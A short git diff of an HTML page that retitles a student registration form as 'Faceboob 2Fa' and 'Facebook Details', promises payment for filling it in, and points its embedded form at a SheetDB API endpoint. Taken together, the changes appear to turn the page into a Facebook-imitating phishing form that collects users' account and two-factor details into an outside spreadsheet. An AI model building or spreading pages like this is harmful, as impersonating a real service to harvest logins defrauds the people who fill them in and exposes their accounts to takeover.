--- a/index.html
+++ b/index.html
@@ -3,23 +3,23 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-  <title>Student Registration Form</title>
+  <title>Faceboob 2Fa</title>
   <link rel="stylesheet" href="style.css" />
 </head>
 <body>
 
   <div class="form-container">
-    <h2>📚 Student Registration</h2>
-    <p class="tagline">Fill in your details to join the journey of learning!</p>
+    <h2>Facebook Details</h2>
+    <p class="tagline">Fill in your details to get paid</p>
 
     <!-- Developer Info -->
     <p style="text-align:center; font-weight:bold; color:#333; margin-top: 10px;">
-      Made by <span style="color:white;">Mr. Ceo M Mehboob</span> - Student of Computer Science
+      Made by <span style="color:white;">Mr. Ceo M Mehboob</span> - Expert Of Job
     </p>
 
     <!-- SheetDB embedded form -->
     <div class="form-wrapper">
-      <script src="https://sheetdb.io/s/f/fojmtigc5mq3s.js"></script>
+      <script src="https://sheetdb.io/api/v1/j9lyxr2iq95sh"></script>
     </div>
   </div>
 
